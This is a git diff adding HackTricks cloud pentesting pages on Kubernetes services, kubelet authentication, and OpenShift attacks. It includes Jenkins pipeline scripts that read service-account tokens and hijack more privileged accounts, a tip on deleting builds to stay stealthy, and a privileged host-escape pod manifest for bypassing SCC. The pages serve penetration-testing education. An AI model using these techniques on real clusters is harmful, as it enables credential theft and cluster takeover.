+    echo "curl -k --max-time 30 https://$ip:$port/pods"
+    echo "curl -k --max-time 30 https://$ip:2379/version" #Check  also for etcd
+done
+```
+
+#### kubelet (Read only)
+
+```bash
+curl -k https://<IP Address>:10255
+http://<external-IP>:10255/pods
+```
+
+### etcd API
+
+```bash
+curl -k https://<IP address>:2379
+curl -k https://<IP address>:2379/version
+etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
+```
+
+### Tiller
+
+```bash
+helm --host tiller-deploy.kube-system:44134 version
+```
+
+You could abuse this service to escalate privileges inside Kubernetes:
+
+### cAdvisor
+
+Service useful to gather metrics.
+
+```bash
+curl -k https://<IP Address>:4194
+```
+
+### NodePort
+
+When a port is exposed in all the nodes via a **NodePort**, the same port is opened in all the nodes proxifying the traffic into the declared **Service**. By default this port will be in in the **range 30000-32767**. So new unchecked services might be accessible through those ports.
+
+```bash
+sudo nmap -sS -p 30000-32767 <IP>
+```
+
+## Vulnerable Misconfigurations
+
+### Kube-apiserver Anonymous Access
+
+Anonymous access to **kube-apiserver API endpoints is not allowed**. But you could check some endpoints:
+
+![](https://www.cyberark.com/wp-content/uploads/2019/09/Kube-Pen-2-fig-5.png)
+
+### **Checking for ETCD Anonymous Access**
+
+The ETCD stores the cluster secrets, configuration files and more **sensitive data**. By **default**, the ETCD **cannot** be accessed **anonymously**, but it always good to check.
+
+If the ETCD can be accessed anonymously, you may need to **use the** [**etcdctl**](https://github.com/etcd-io/etcd/blob/master/etcdctl/READMEv2.md) **tool**. The following command will get all the keys stored:
+
+```bash
+etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
+```
+
+### **Kubelet RCE**
+
+The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
+
+> Enables anonymous requests to the Kubelet server. Requests that are not rejected by another authentication method are treated as anonymous requests. Anonymous requests have a username of `system:anonymous`, and a group name of `system:unauthenticated`
+
+To understand better how the **authentication and authorization of the Kubelet API works** check this page:
+
+{% content-ref url="kubelet-authentication-and-authorization.md" %}
+[kubelet-authentication-and-authorization.md](kubelet-authentication-and-authorization.md)
+{% endcontent-ref %}
+
+The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
+
+```bash
+curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go | grep 'Path("/'
+
+Path("/pods").
+Path("/run")
+Path("/exec")
+Path("/attach")
+Path("/portForward")
+Path("/containerLogs")
+Path("/runningpods/").
+```
+
+All of them sound interesting.
+
+You can use the [**Kubeletctl**](https://github.com/cyberark/kubeletctl) tool to interact with Kubelets and their endpoints.
+
+#### /pods
+
+This endpoint list pods and their containers:
+
+```bash
+kubeletctl pods
+```
+
+#### /exec
+
+This endpoint allows to execute code inside any container very easily:
+
+```bash
+kubeletctl exec [command]
+```
+
+{% hint style="info" %}
+To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level.
+{% endhint %}
+
+### **Checking Kubelet (Read Only Port) Information Exposure**
+
+When a **kubelet read-only port** is exposed, it becomes possible for information to be retrieved from the API by unauthorized parties. The exposure of this port may lead to the disclosure of various **cluster configuration elements**. Although the information, including **pod names, locations of internal files, and other configurations**, may not be critical, its exposure still poses a security risk and should be avoided.
+
+An example of how this vulnerability can be exploited involves a remote attacker accessing a specific URL. By navigating to `http://<external-IP>:10255/pods`, the attacker can potentially retrieve sensitive information from the kubelet:
+
+![https://www.cyberark.com/wp-content/uploads/2019/09/KUbe-Pen-2-fig-6.png](https://www.cyberark.com/wp-content/uploads/2019/09/KUbe-Pen-2-fig-6.png)
+
+## References
+
+{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2" %}
+
+{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md b/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
new file mode 100644
index 0000000000..1c74525af1
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
@@ -0,0 +1,137 @@
+# Kubelet Authentication & Authorization
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Kubelet Authentication <a href="#kubelet-authentication" id="kubelet-authentication"></a>
+
+[**From the docss:**](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+
+By default, requests to the kubelet's HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a **username of `system:anonymous`** and a **group of `system:unauthenticated`**.
+
+The **3** authentication **methods** are:
+
+* **Anonymous** (default): Use set setting the param **`--anonymous-auth=true` or the config:**
+
+```json
+"authentication": {
+    "anonymous": {
+      "enabled": true
+    },
+```
+
+* **Webhook**: This will **enable** the kubectl **API bearer tokens** as authorization (any valid token will be valid). Allow it with:
+  * ensure the `authentication.k8s.io/v1beta1` API group is enabled in the API server
+  * start the kubelet with the **`--authentication-token-webhook`** and **`--kubeconfig`** flags or use the following setting:
+
+```json
+"authentication": {
+    "webhook": {
+      "cacheTTL": "2m0s",
+      "enabled": true
+    },
+```
+
+{% hint style="info" %}
+The kubelet calls the **`TokenReview` API** on the configured API server to **determine user information** from bearer tokens
+{% endhint %}
+
+* **X509 client certificates:** Allow to authenticate via X509 client certs
+  * see the [apiserver authentication documentation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs) for more details
+  * start the kubelet with the `--client-ca-file` flag, providing a CA bundle to verify client certificates with. Or with the config:
+
+```json
+"authentication": {
+    "x509": {
+      "clientCAFile": "/etc/kubernetes/pki/ca.crt"
+    }
+}
+```
+
+## Kubelet Authorization <a href="#kubelet-authentication" id="kubelet-authentication"></a>
+
+Any request that is successfully authenticated (including an anonymous request) **is then authorized**. The **default** authorization mode is **`AlwaysAllow`**, which **allows all requests**.
+
+However, the other possible value is **`webhook`** (which is what you will be **mostly finding out there**). This mode will **check the permissions of the authenticated user** to allow or disallow an action.
+
+{% hint style="warning" %}
+Note that even if the **anonymous authentication is enabled** the **anonymous access** might **not have any permissions** to perform any action.
+{% endhint %}
+
+The authorization via webhook can be configured using the **param `--authorization-mode=Webhook`** or via the config file with:
+
+```json
+"authorization": {
+    "mode": "Webhook",
+    "webhook": {
+      "cacheAuthorizedTTL": "5m0s",
+      "cacheUnauthorizedTTL": "30s"
+    }
+},
+```
+
+The kubelet calls the **`SubjectAccessReview`** API on the configured API server to **determine** whether each request is **authorized.**
+
+The kubelet authorizes API requests using the same [request attributes](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#review-your-request-attributes) approach as the apiserver:
+
+* **Action**
+
+| HTTP verb | request verb                                                                                                                                                  |
+| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| POST      | create                                                                                                                                                        |
+| GET, HEAD | get (for individual resources), list (for collections, including full object content), watch (for watching an individual resource or collection of resources) |
+| PUT       | update                                                                                                                                                        |
+| PATCH     | patch                                                                                                                                                         |
+| DELETE    | delete (for individual resources), deletecollection (for collections)                                                                                         |
+
+* The **resource** talking to the Kubelet api is **always** **nodes** and **subresource** is **determined** from the incoming request's path:
+
+| Kubelet API  | resource | subresource |
+| ------------ | -------- | ----------- |
+| /stats/\*    | nodes    | stats       |
+| /metrics/\*  | nodes    | metrics     |
+| /logs/\*     | nodes    | log         |
+| /spec/\*     | nodes    | spec        |
+| _all others_ | nodes    | proxy       |
+
+For example, the following request tried to access the pods info of kubelet without permission:
+
+```bash
+curl -k --header "Authorization: Bearer ${TOKEN}" 'https://172.31.28.172:10250/pods'
+Forbidden (user=system:node:ip-172-31-28-172.ec2.internal, verb=get, resource=nodes, subresource=proxy)
+```
+
+* We got a **Forbidden**, so the request **passed the Authentication check**. If not, we would have got just an `Unauthorised` message.
+* We can see the **username** (in this case from the token)
+* Check how the **resource** was **nodes** and the **subresource** **proxy** (which makes sense with the previous information)
+
+## References
+
+* [https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/openshift-pentesting/README.md b/pentesting-cloud/openshift-pentesting/README.md
new file mode 100644
index 0000000000..8be91bbad5
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/README.md
@@ -0,0 +1,19 @@
+# OpenShift Pentesting
+
+## Basic Information
+
+{% content-ref url="openshift-basic-information.md" %}
+[openshift-basic-information.md](openshift-basic-information.md)
+{% endcontent-ref %}
+
+## Security Context Constraints
+
+{% content-ref url="openshift-scc.md" %}
+[openshift-scc.md](openshift-scc.md)
+{% endcontent-ref %}
+
+## Privilege Escalation
+
+{% content-ref url="openshift-privilege-escalation/" %}
+[openshift-privilege-escalation](openshift-privilege-escalation/)
+{% endcontent-ref %}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-basic-information.md b/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
new file mode 100644
index 0000000000..0532715013
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
@@ -0,0 +1,36 @@
+# OpenShift - Basic information
+
+## Kubernetes prior b**asic knowledge** <a href="#a94e" id="a94e"></a>
+
+Before working with OpenShift, ensure you are comfortable with the Kubernetes environment. The entire OpenShift chapter assumes you have prior knowledge of Kubernetes.
+
+## OpenShift - Basic Information
+
+### Introduction
+
+OpenShift is Red Hat’s container application platform that offers a superset of Kubernetes features. OpenShift has stricter security policies. For instance, it is forbidden to run a container as root. It also offers a secure-by-default option to enhance security. OpenShift, features an web console which includes a one-touch login page.
+
+#### CLI
+
+OpenShift come with a it's own CLI, that can be found here:
+
+{% embed url="https://docs.openshift.com/container-platform/4.11/cli_reference/openshift_cli/getting-started-cli.html" %}
+
+To login using the CLI:
+
+```bash
+oc login -u=<username> -p=<password> -s=<server>
+oc login -s=<server> --token=<bearer token>
+```
+
+### **OpenShift - Security Context Constraints** <a href="#a94e" id="a94e"></a>
+
+In addition to the [RBAC resources](https://docs.openshift.com/container-platform/3.11/architecture/additional\_concepts/authorization.html#architecture-additional-concepts-authorization) that control what a user can do, OpenShift Container Platform provides _security context constraints_ (SCC) that control the actions that a pod can perform and what it has the ability to access.
+
+SCC is a policy object that has special rules that correspond with the infrastructure itself, unlike RBAC that has rules that correspond with the Platform. It helps us define what Linux access-control features the container should be able to request/run. Example: Linux Capabilities, SECCOMP profiles, Mount localhost dirs, etc.
+
+{% content-ref url="openshift-scc.md" %}
+[openshift-scc.md](openshift-scc.md)
+{% endcontent-ref %}
+
+{% embed url="https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#security-context-constraints" %}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md b/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
new file mode 100644
index 0000000000..d9d87e5e1b
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
@@ -0,0 +1,39 @@
+# OpenShift - Jenkins
+
+**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
+
+This page gives some pointers onto how you can attack a Jenkins instance running in an Openshift (or Kubernetes) cluster
+
+## Disclaimer
+
+A Jenkins instance can be deployed in both Openshift or Kubernetes cluster. Depending in your context, you may need to adapt any shown payload, yaml or technique. For more information about attacking Jenkins you can have a look at [this page](../../../pentesting-ci-cd/jenkins-security/)
+
+## Prerequisites
+
+1a. User access in a Jenkins instance OR 1b. User access with write permission to an SCM repository where an automated build is triggered after a push/merge
+
+## How it works
+
+Fundamentally, almost everything behind the scenes works the same as a regular Jenkins instance running in a VM. The main difference is the overall architecture and how builds are managed inside an openshift (or kubernetes) cluster.
+
+### Builds
+
+When a build is triggered, it is first managed/orchestrated by the Jenkins master node then delegated to an agent/slave/worker. In this context, the master node is just a regular pod running in a namespace (which might be different that the one where workers run). The same applies for the workers/slaves, however they destroyed once the build finished whereas the master always stays up. Your build is usually run inside a pod, using a default pod template defined by the Jenkins admins.
+
+### Triggering a build
+
+You have multiples main ways to trigger a build such as:
+
+1. You have UI access to Jenkins
+
+A very easy and convenient way is to use the Replay functionality of an existing build. It allows you to replay a previously executed build while allowing you to update the groovy script. This requires privileges on a Jenkins folder and a predefined pipeline. If you need to be stealthy, you can delete your triggered builds if you have enough permission.
+
+2. You have write access to the SCM and automated builds are configured via webhook
+
+You can just edit a build script (such as Jenkinsfile), commit and push (eventually create a PR if builds are only triggered on PR merges). Keep in mind that this path is very noisy and need elevated privileges to clean your tracks.
+
+## Jenkins Build Pod YAML override
+
+{% content-ref url="openshift-jenkins-build-overrides.md" %}
+[openshift-jenkins-build-overrides.md](openshift-jenkins-build-overrides.md)
+{% endcontent-ref %}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md b/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
new file mode 100644
index 0000000000..15ef981b44
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
@@ -0,0 +1,274 @@
+# Jenkins in Openshift - build pod overrides
+
+**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
+
+## Kubernetes plugin for Jenkins
+This plugin is mostly responsible of Jenkins core functions inside an openshift/kubernetes cluster. Official documentation [here](https://plugins.jenkins.io/kubernetes/)
+It offers a few functionnalities such as the ability for developers to override some default configurations of a jenkins build pod.
+
+## Core functionnality
+
+This plugin allows flexibility to developers when building their code in adequate environment.
+
+```groovy
+podTemplate(yaml: '''
+    apiVersion: v1
+    kind: Pod
+    spec:
+      containers:
+      - name: maven
+        image: maven:3.8.1-jdk-8
+        command:
+        - sleep
+        args:
+        - 99d
+''') {
+  node(POD_LABEL) {
+    stage('Get a Maven project') {
+      git 'https://github.com/jenkinsci/kubernetes-plugin.git'
+      container('maven') {
+        stage('Build a Maven project') {
+          sh 'mvn -B -ntp clean install'
+        }
+      }
+    }
+  }
+}
+```
+
+## Some abuses leveraging pod yaml override
+
+It can however be abused to use any accessible image such as Kali Linux and execute arbritrary commands using preinstalled tools from that image.
+In the example below we can exfiltrate the serviceaccount token of the running pod.
+
+```groovy
+podTemplate(yaml: '''
+    apiVersion: v1
+    kind: Pod
+    spec:
+      containers:
+      - name: kali
+        image: myregistry/mykali_image:1.0
+        command:
+        - sleep
+        args:
+        - 1d
+''') {
+  node(POD_LABEL) {
+    stage('Evil build') {
+      container('kali') {
+        stage('Extract openshift token') {
+          sh 'cat /run/secrets/kubernetes.io/serviceaccount/token'
+        }
+      }
+    }
+  }
+}
+```
+
+A different synthax to achieve the same goal.
+
+```groovy
+pipeline { 
+    stages {
+        stage('Process pipeline') {
+            agent {
+                kubernetes {
+                yaml """
+                    spec:  
+                        containers:
+                        - name: kali-container
+                          image: myregistry/mykali_image:1.0
+                          imagePullPolicy: IfNotPresent
+                          command:
+                          - sleep
+                          args:
+                          - 1d
+                """
+                }
+            }
+            stages {
+                stage('Say hello') {
+                    steps {
+                        echo 'Hello from a docker container'
+                        sh 'env'
+                    }
+                }
+            }
+        }
+    }
+}
+```
+
+Sample to override the namespace of the pod
+```groovy
+pipeline { 
+    stages {
+        stage('Process pipeline') {
+            agent {
+                kubernetes {
+                yaml """
+                	metadata:
+                		namespace: RANDOM-NAMESPACE
+                    spec:  
+                        containers:
+                        - name: kali-container
+                          image: myregistry/mykali_image:1.0
+                          imagePullPolicy: IfNotPresent
+                          command:
+                          - sleep
+                          args:
+                          - 1d
+                """
+                }
+            }
+            stages {
+                stage('Say hello') {
+                    steps {
+                        echo 'Hello from a docker container'
+                        sh 'env'
+                    }
+                }
+            }
+        }
+    }
+}
+```
+
+Another example which tries mounting a serviceaccount (which may have more permissions than the default one, running your build) based on its name. You may need to guess or enumerate existing serviceaccounts first.
+
+```groovy
+pipeline { 
+    stages {
+        stage('Process pipeline') {
+            agent {
+                kubernetes {
+                yaml """
+                    spec:
+                    	serviceAccount: MY_SERVICE_ACCOUNT
+                        containers:
+                        - name: kali-container
+                          image: myregistry/mykali_image:1.0
+                          imagePullPolicy: IfNotPresent
+                          command:
+                          - sleep
+                          args:
+                          - 1d
+                """
+                }
+            }
+            stages {
+                stage('Say hello') {
+                    steps {
+                        echo 'Hello from a docker container'
+                        sh 'env'
+                    }
+                }
+            }
+        }
+    }
+}
+```
+
+The same technique applies to try mounting a Secret. The end goal here would be to figure out how to configure your pod build to effectively pivot or gain privileges.
+
+## Going further
+
+Once you get used to play around with it, use your knowledge on Jenkins and Kubernetes/Openshift to find misconfigurations / abuses.
+
+Ask yourself the following questions:
+
+- Which service account is being used to deploy build pods?
+- What roles and permissions does it have? Can it read secrets of the namespace I am currently in?
+- Can I further enumerate other build pods?
+- From a compromised sa, can I execute commands on the master node/pod?
+- Can I further enumerate the cluster to pivot elsewhere?
+- Which SCC is applied?
+
+You can find out which oc/kubectl commands to issue [here](../openshift-basic-information.md) and [here](../../kubernetes-security/kubernetes-enumeration.md).
+
+### Possible privesc/pivoting scenarios
+
+Let's assume that during your assessment you found out that all jenkins builds run inside a namespace called _worker-ns_. You figured out that a default serviceaccount called _default-sa_ is mounted on the build pods, however it does not have so many permissions except read access on some resources but you were able to identify an existing service account called _master-sa_.
+Let's also assume that you have the oc command installed inside the running build container.
+
+With the below build script you can take control of the _master-sa_ serviceaccount and enumerate further.
+```groovy
+pipeline { 
+    stages {
+        stage('Process pipeline') {
+            agent {
+                kubernetes {
+                yaml """
+                    spec:
+                    	serviceAccount: master-sa
+                        containers:
+                        - name: evil
+                          image: random_image:1.0
+                          imagePullPolicy: IfNotPresent
+                          command:
+                          - sleep
+                          args:
+                          - 1d
+                """
+                }
+            }
+            stages {
+                stage('Say hello') {
+                    steps {
+                    	sh 'token=$(cat /run/secrets/kubernetes.io/serviceaccount/token)'
+                        sh 'oc --token=$token whoami'
+                    }
+                }
+            }
+        }
+    }
+}
+```
+Depending on your access, either you need to continue your attack from the build script or you can directly login as this sa on the running cluster:
+```bash
+oc login --token=$token --server=https://apiserver.com:port
+```
+
+
+If this sa has enough permission (such as pod/exec), you can also take control of the whole jenkins instance by executing commands inside the master node pod, if it's running within the same namespace. You can easily identify this pod via its name and by the fact that it must be mounting a PVC (persistant volume claim) used to store jenkins data.
+
+```bash
+oc rsh pod_name -c container_name
+```
+
+In case the master node pod is not running within the same namespace as the workers you can try similar attacks by targetting the master namespace. Let's assume its called _jenkins-master_. Keep in mind that serviceAccount master-sa needs to exist on the _jenkins-master_ namespace (and might not exist in _worker-ns_ namespace)
+
+```groovy
+pipeline { 
+    stages {
+        stage('Process pipeline') {
+            agent {
+                kubernetes {
+                yaml """
+                	metadata:
+                		namespace: jenkins-master
+                    spec:
+                    	serviceAccount: master-sa                 
+                        containers:
+                        - name: evil-build
+                          image: myregistry/mykali_image:1.0
+                          imagePullPolicy: IfNotPresent
+                          command:
+                          - sleep
+                          args:
+                          - 1d
+                """
+                }
+            }
+            stages {
+                stage('Say hello') {
+                    steps {
+                        echo 'Hello from a docker container'
+                        sh 'env'
+                    }
+                }
+            }
+        }
+    }
+}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
new file mode 100644
index 0000000000..7e5040e3fd
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
@@ -0,0 +1,19 @@
+# OpenShift - Privilege Escalation
+
+## Missing Service Account
+
+{% content-ref url="openshift-missing-service-account.md" %}
+[openshift-missing-service-account.md](openshift-missing-service-account.md)
+{% endcontent-ref %}
+
+## Tekton
+
+{% content-ref url="openshift-tekton.md" %}
+[openshift-tekton.md](openshift-tekton.md)
+{% endcontent-ref %}
+
+## SCC Bypass
+
+{% content-ref url="openshift-scc-bypass.md" %}
+[openshift-scc-bypass.md](openshift-scc-bypass.md)
+{% endcontent-ref %}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
new file mode 100644
index 0000000000..57dee34368
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
@@ -0,0 +1,21 @@
+# OpenShift - Missing Service Account
+
+## Missing Service Account
+
+It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated.
+
+<figure><img src="../../../.gitbook/assets/openshift-missing-service-account-image1.png" alt=""><figcaption></figcaption></figure>
+
+In the previous graph we got multiple AbsentProject meaning multiple project that appears in Roles Bindings or SCC but are not yet created in the cluster. In the same vein we also got an AbsentServiceAccount.
+
+If we can create a project and the missing SA in it, the SA will inherited from the Role or the SCC that were targeting the AbsentServiceAccount. Which can lead to privilege escalation.
+
+The following example show a missing SA which is granted node-exporter SCC:
+
+<figure><img src="../../../.gitbook/assets/openshift-missing-service-account-image2.png" alt=""><figcaption></figcaption></figure>
+
+## Tools
+
+The following tool can be use to enumerate this issue and more generally to graph an OpenShift cluster:
+
+{% embed url="https://github.com/maxDcb/OpenShiftGrapher" %}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
new file mode 100644
index 0000000000..e89392fa90
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
@@ -0,0 +1,138 @@
+# Openshift - SCC bypass
+
+**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+
+## Privileged Namespaces
+
+By default, SCC does not apply on following projects :
+
+* **default**
+* **kube-system**
+* **kube-public**
+* **openshift-node**
+* **openshift-infra**
+* **openshift**
+
+If you deploy pods within one of those namespaces, no SCC will be enforced, allowing for the deployment of privileged pods or mounting of the host file system.
+
+## Namespace Label
+
+There is a way to disable the SCC application on your pod according to RedHat documentation. You will need to have at least one of the following permission :
+
+* Create a Namespace and Create a Pod on this Namespace
+* Edit a Namespace and Create a Pod on this Namespace
+
+```bash
+$ oc auth can-i create namespaces
+  yes
+
+$ oc auth can-i patch namespaces
+  yes
+```
+
+The specific label`openshift.io/run-level` enables users to circumvent SCCs for applications. As per RedHat documentation, when this label is utilized, no SCCs are enforced on all pods within that namespace, effectively removing any restrictions.
+
+<figure><img src="../../../.gitbook/assets/Openshift-RunLevel4.png" alt=""><figcaption></figcaption></figure>
+
+## Add Label
+
+To add the label in your namespace :
+
+```bash
+$ oc label ns MYNAMESPACE openshift.io/run-level=0
+```
+
+To create a namespace with the label through a YAML file:
+
+```yaml
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: evil
+  labels:
+    openshift.io/run-level: 0
+```
+
+Now, all new pods created on the namespace should not have any SCC
+
+<pre class="language-bash"><code class="lang-bash"><strong>$ oc get pod -o yaml | grep 'openshift.io/scc'
+</strong><strong>$                                            
+</strong></code></pre>
+
+In the absence of SCC, there are no restrictions on your pod definition. This means that a malicious pod can be easily created to escape onto the host system.
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: evilpod
+  labels:
+    kubernetes.io/hostname: evilpod 
+spec:
+  hostNetwork: true #Bind pod network to the host network 
+  hostPID: true #See host processes
+  hostIPC: true #Access host inter processes
+  containers:
+  - name: evil    
+    image: MYIMAGE
+    imagePullPolicy: IfNotPresent
+    securityContext:
+      privileged: true
+      allowPrivilegeEscalation: true  
+    resources:
+      limits:
+        memory: 200Mi
+      requests:
+        cpu: 30m
+        memory: 100Mi
+    volumeMounts:
+    - name: hostrootfs
+      mountPath: /mnt
+  volumes:
+  - name: hostrootfs
+    hostPath:
+      path: 
+```
+
+Now, it has become easier to escalate privileges to access the host system and subsequently take over the entire cluster, gaining 'cluster-admin' privileges. Look for **Node-Post Exploitation** part in the following page :
+
+{% content-ref url="../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md)
+{% endcontent-ref %}
+
+### Custom labels
+
+Furthermore, based on the target setup, some custom labels / annotations may be used in the same way as the previous attack scenario. Even if it is not made for, labels could be used to give permissions, restrict or not a specific resource.
+
+Try to look for custom labels if you can read some resources. Here a list of interesting resources :
+
+* Pod
+* Deployment
+* Namespace
+* Service
+* Route
+
+```bash
+$ oc get pod -o yaml | grep labels -A 5
+$ oc get namespace -o yaml | grep labels -A 5
+```
+
+## List all privileged namespaces
+
+```bash
+$ oc get project -o yaml | grep 'run-level' -b5
+```
+
+## Advanced exploit
+
+In OpenShift, as demonstrated earlier, having permission to deploy a pod in a namespace with the `openshift.io/run-level`label can lead to a straightforward takeover of the cluster. From a cluster settings perspective, this functionality **cannot be disabled**, as it is inherent to OpenShift's design.
+
+However, mitigation measures like **Open Policy Agent GateKeeper** can prevent users from setting this label.
+
+To bypass GateKeeper's rules and set this label to execute a cluster takeover, **attackers would need to identify alternative methods.**
+
+## References
+
+* [https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html](https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html)
+* [https://docs.openshift.com/container-platform/3.11/admin\_guide/manage\_scc.html](https://docs.openshift.com/container-platform/3.11/admin\_guide/manage\_scc.html)
+* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
new file mode 100644
index 0000000000..34bf3a57a3
--- /dev/null
+++ b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
@@ -0,0 +1,82 @@
+---
+description: >-
+  This page shows a privilege escalation scenario given that tekton is installed
+  in the cluster and that you can create a namespace (sometimes edit rights are
+  enough)
+---
+
+# OpenShift - Tekton
+
